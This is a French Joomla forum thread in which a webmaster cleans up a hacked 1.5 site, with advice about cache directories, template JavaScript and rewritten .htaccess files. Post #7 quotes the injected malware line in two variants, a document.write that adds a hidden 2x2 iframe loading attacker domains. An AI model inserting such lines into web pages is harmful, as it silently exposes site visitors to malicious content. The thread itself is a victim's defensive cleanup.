site signale comme malveillant

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] site signale comme malveillant

    Bonjour,
    He oui je suis encore en 1.5.26, ça ne dépend pas de moi mais ça ne saurait tarder, nous allons passer en 2.5 bientôt.
    Il parait que certaines pages de mon site contiennent peut être des scripts malveillants. L'avis fourni par google me dit qu'il y a un logiciel hébergé sur 1 domaine y compris midaugustoperations.pro
    J'ai d'abord comparé tous les lignes des fichiers du site hébergé avec les lignes sauvegardées sur mon PC (sous linux c'est très façile)
    aucun fichier n'a été changé. En allant sur le forum j'ai vu qu'il y avait sur le web des outils j'ai donc utilisé Sucuri SiteCheck et là il m'a trouvé tout un tas de fichier js malveillant sans y entrer dans le détails, je les ai remplacé par les originaux qui sont sur mon PC. Je doute de l'efficacité de ce scanner. Pourtant il se passe quelque chose d'anormal, je trouve les temps de réponse très longs, Il me semble qu'aléatoirement il essaie de se connecter sur des site comme : remindersatom.ru, securefills.ru, modelcnets.ru, etc.. sans résultat
    J'ai bien crawlprotect, mais je pense que s'il y a des des codes malveillants ils ont été placés avant.
    Comment je peux m'en sortir?

    A+
    Merci
    GJ
    Dernière édition par guytou13 à 07/09/2012, 08h44
    GJ

  • #2
    Re : site signale comme malveillant

    Bonjour,

    Vérifier les répertoires cache, et le JavaScript du template.

    Certains malware planquent un répertoire caché dans /cache et injectent uniquement une ligne dans le JavaScript template.

    Vider tous les caches Joomla! (via FTP), ainsi que le cache navigateur.
    Pas de demande de support par MP.
    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

    Commentaire


    • #3
      Re : site signale comme malveillant

      Bonjour,
      Merci du conseil, j'ai bien nettoyé les caches, effectivement le fichier template.js de mon template avait été modifie. Mais lors de l'ouverture de ma page principale (ou en admin) je vois bien que mon site essaie d'accéder à un autre site: cette fois à idahovolcanoes.ru en fait c'est rerouté à partir de mon fichier .htaccess, comme ils arrivent à accéder à ce fichier? il est en protection 644. A chaque que je me connecte au site le fichier .htaccess est écrasé par un malveillant.
      Si vous pouvez continuer à m'aider, de mon côté je cherche.
      merci
      GJ
      GJ

      Commentaire


      • #4
        Re : site signale comme malveillant

        Ces malware .htaccess se planquent un peu partout, souvent dans un répertoire caché, ou en fin des JavaScripts, ou encore dans les surcharges des templates. En bref, un peu n'importe où suivant la souche.

        Donc à part examiner les fichiers, et réinstaller 1 à 1 toutes les extensions, plus écraser Joomla! avec un exemplaire propre (sauf le répertoire installation, on n'a que peu de pistes.

        Mais penser aussi à mettre une protection active genre CrawlProtect, à changer tous ses mots de passe, etc.
        Pas de demande de support par MP.
        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

        Commentaire


        • #5
          Re : site signale comme malveillant

          Mais il y a crawlprotect d'installé et c'est ce .htaccess qui est écrasé par le maveillant.
          A+
          GJ
          GJ

          Commentaire


          • #6
            Re : site signale comme malveillant

            Ce qui indique que le malware agit depuis l'intérieur de ton site et qu'il était déjà présent (et peut-être dormant) depuis longtemps.

            Et dans ce cas, il est possible que CrawlProtect aussi ait été infecté.

            Dans ce cas, désinstaller aussi CrawlProtect (et se stables de base de données) et réinstaller à propre le tout.
            Pas de demande de support par MP.
            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

            Commentaire


            • #7
              Re : site signale comme malveillant

              J'ai stoppé le site pour le nettoyer.
              He bien tous mes fichiers java (.js) 494! étaient vérolés avec la même ligne de code qui se balade un peu n'importe ou, plutôt à la fin :
              document.write('<iframe src="http://peripheralstango.info/Songs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>')

              mais dès que j'ai fini de corriger tous ces fichiers, ils sont de nouveau vérolés avec une nouvelle ligne de code au milieu du code original :
              document.write('<iframe src="http://radminmultiserver.ru/Graphs?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>')

              A+

              GJ
              Dernière édition par guytou13 à 04/09/2012, 03h16
              GJ

              Commentaire


              • #8
                Re : site signale comme malveillant

                Tu as donc un autre coucou qui traine sur ton site et c'est lui qui régénère les véroles.
                Pas de demande de support par MP.
                S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                Commentaire


                • #9
                  Re : site signale comme malveillant

                  J'ai tout effacé du site, j'ai restauré avec une sauvegarde apparemment correcte. J'ai oublié dans configuration.php de mettre le site hors ligne si bien que dès que j'ai fini de restaurer quelqu'un s'est mis en ligne et les fichiers js ont été de nouveau vérolé. Cela voudrai dire qu'il y a un code qui était dormant dans la sauvegarde. J'ai recherché dans tous les fichiers js des lignes avec "document.write" a effet pervers., je regarde aussi tous les fichiers .htaccess
                  et quoi d'autres?

                  merci
                  GJ

                  Commentaire


                  • #10
                    Re : site signale comme malveillant

                    Bonjour,

                    J'ai exactement le même problème que toi sauf que je n'arrive pas à trouver le fichier infecté !

                    Commentaire


                    • #11
                      Re : site signale comme malveillant

                      Bonjour,
                      Envoyé par guildmage Voir le message
                      J'ai exactement le même problème que toi sauf que je n'arrive pas à trouver le fichier infecté !
                      Traquer l'origine exacte de ce type d'intrusion n'est que rarement évident. Il faut se munir d'un tonneau de patience, quelques litres de café (en gardant le marc, ça peut servir en divination ), d'une assistance par voyante, d'un ou 2 poulets vaudou, et pour finir, d'une dose énorme de pifomètre...

                      Vu le nombre assez surprenant de ces malware, ils sont très délicats à traquer, et ne sont pas toujours où on les attendrait.
                      Pas de demande de support par MP.
                      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                      Commentaire


                      • #12
                        Re : site signale comme malveillant

                        Merci pour les conseils, mais on fait quoi après une semaine de café... ?

                        Commentaire


                        • #13
                          Re : site signale comme malveillant

                          Envoyé par guildmage Voir le message
                          Merci pour les conseils, mais on fait quoi après une semaine de café... ?
                          Comme tout le monde, on relit les conseils, et on se met au boulot pour traquer, ou on sort sa carte bancaire gold et on fait appel à un pro
                          Pas de demande de support par MP.
                          S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                          Commentaire


                          • #14
                            Re : site signale comme malveillant

                            Avant de recopier j'ai mis mise dans configuration.php le site hors ligne. J'ai tout recopié;, j'ai installé crawlprotect et je me suis connecté en backend il y a eu des fichiers.js modifié dans le dossier administrator et j'ai trouvé aussi un fichier .htaccess avec du code, je ne sais pas si je dois vous l'afficher, c'est ce fichier qui est recopié un peu partout dans le site.
                            Depuis il n'y a plus de problème.
                            merci à Jisse03
                            GJ
                            GJ

                            Commentaire


                            • #15
                              Re : site signale comme malveillant

                              Bonsoir,

                              Merci jisse03 pour son aide.
                              J'ai donc tout effacé de mon site. J'avais une sauvegarde de 2 mois (simple copie), après avoir vérifié qu'il n'y avait rien d'anormal qui traînait j'ai restauré le site, avant j'ai modifié le fichier configuration.php pour mettre le site hors ligne. Un fois tout copié, j'ai réinstallé crawlprotect. J'ai lancé le backend, et la qtous les fichiers .js on été de nouveau modifiés (dans le dossier administrator/include/js/ThemeOffice), de plus un fichier .htaccess a été copié dans le dossier administrator. J'ai écrasé les fichiers js et effacé le fichier .htaccess (après vérification ce fichier .htacces n'était pas dans le dossier d'origine). Je ne sais pas si je dois vous afficher ce fichier .htacces?
                              Finalement après essai en administrator il n'y plus eu de tentatives de connection à un site xxx.ru, j'ai de nouveau mis le site en ligne tout est correct.
                              Je suis allé dans les outils de webmaster google j'ai lancé une vérification qui n'a rien trouvé. Je peux fermer le post.
                              Merci
                              GJ
                              GJ

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X